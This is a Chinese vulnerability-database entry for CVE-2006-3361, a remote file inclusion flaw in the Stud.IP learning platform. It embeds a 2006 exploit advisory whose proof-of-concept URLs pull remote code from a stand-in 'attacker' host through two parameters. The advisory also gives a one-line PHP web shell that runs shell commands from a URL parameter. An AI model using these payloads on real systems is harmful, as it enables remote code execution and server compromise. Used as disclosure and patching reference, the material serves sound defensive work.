CVE-2006-3361
CVSS5.1
发布时间 :2006-07-06 16:05:00
修订时间 :2011-03-07 21:38:28
NMCOE    

[原文]PHP remote file inclusion vulnerability in Stud.IP 1.3.0-2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the (1) _PHPLIB[libdir] parameter in studip-phplib/oohforms.inc and (2) ABSOLUTE_PATH_STUDIP parameter in studip-htdocs/archiv_assi.php.


[CNNVD]RETIRED: Stud.IP多个PHP远程文件包含漏洞(CNNVD-200607-060)

        Stud.IP 1.3.0-2及之前版本存在PHP远程文件包含漏洞。当register_globals启用时,远程攻击者借助(1)studip-phplib/oohforms.inc 中的 _PHPLIB[libdir]参数和(2)studip-htdocs/archiv_assi.php中的ABSOLUTE_PATH_STUDIP 参数,执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3361
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3361
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-060
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/27487
(UNKNOWN)  XF  studip-multiple-file-include(27487)
http://www.vupen.com/english/advisories/2006/2618
(UNKNOWN)  VUPEN  ADV-2006-2618
http://securitytracker.com/id?1016418
(UNKNOWN)  SECTRACK  1016418
http://hamid.ir/security/studip.txt
(UNKNOWN)  MISC  http://hamid.ir/security/studip.txt
http://www.securityfocus.com/bid/18741
(UNKNOWN)  BID  18741

- 漏洞信息

RETIRED: Stud.IP多个PHP远程文件包含漏洞
中危 输入验证
2006-07-06 00:00:00 2006-07-07 00:00:00
远程  
        Stud.IP 1.3.0-2及之前版本存在PHP远程文件包含漏洞。当register_globals启用时,远程攻击者借助(1)studip-phplib/oohforms.inc 中的 _PHPLIB[libdir]参数和(2)studip-htdocs/archiv_assi.php中的ABSOLUTE_PATH_STUDIP 参数,执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1969)

Stud.IP <= 1.3.0-2 Multiple Remote File Include Vulnerabilities (EDBID:1969)
php webapps
2006-07-01 Verified
0 Hamid Ebadi
N/A [点击下载]
/*------------------------------------------------
               IHS Public advisory
-------------------------------------------------*/

Stud.IP Remote File Inclusion
Stud.IP is a learning and an information management
system for universities, educational facilities and
enterprises.

http://www.studip.de
http://www.data-quest.de
http://www.sourceforge.net/projects/studip


Discovered by Hamid Ebadi Credit :
all go to IHS team (IHS : IRAN HOMELAND SECURITY)
www.ihsteam.com (persian)
www.ihsteam.net (english)


The original article can be found at:
http://www.hamid.ir/security/
http://www.IHSteam.com

Vulnerable Systems:
       studip 1.3.0-2 and below


Input passed to the "_PHPLIB[libdir]" parameter in
studip-phplib/oohforms.inc and to the
"ABSOLUTE_PATH_STUDIP"  parameter in
studip-htdocs/archiv_assi.php is not properly verified
before being used to include files.
This can be exploited to execute arbitrary PHP code by
including files from local or external resources.

POC Exploits:

The following URL will cause the server to include
external files
http://localhost/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=http://attacker/cmd.gif?
http://localhost/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=http://attacker/cmd.gif?

cmd.gif
<?
passthru($_GET['cmd']);
?>

Solution:
Edit the source code to ensure that input is properly verified.


greeting :
LorD , NT , C0d3r of IHS

# milw0rm.com [2006-07-01]
		

- 漏洞信息

28213
Stud.IP studip-htdocs/archiv_assi.php ABSOLUTE_PATH_STUDIP Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-07-03 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站